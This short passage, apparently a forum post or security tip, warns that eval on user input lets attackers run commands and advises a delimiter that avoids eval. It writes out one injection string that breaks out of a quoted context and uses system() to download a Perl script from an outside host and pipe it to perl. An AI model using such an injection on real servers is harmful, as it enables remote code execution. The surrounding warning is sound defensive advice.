Although it is unlikely that the Apache user 'nobody' will be able to delete /etc/passwd (given as an example, of course), there are far more evil things that they can do, especially with e-commerce sites.

Considering how much you can do with one line:    ...'); system('lynx --source http://www.hax.it/script.pl|perl'); (' You would be well advised to use a simple delimiter that doesn't require eval.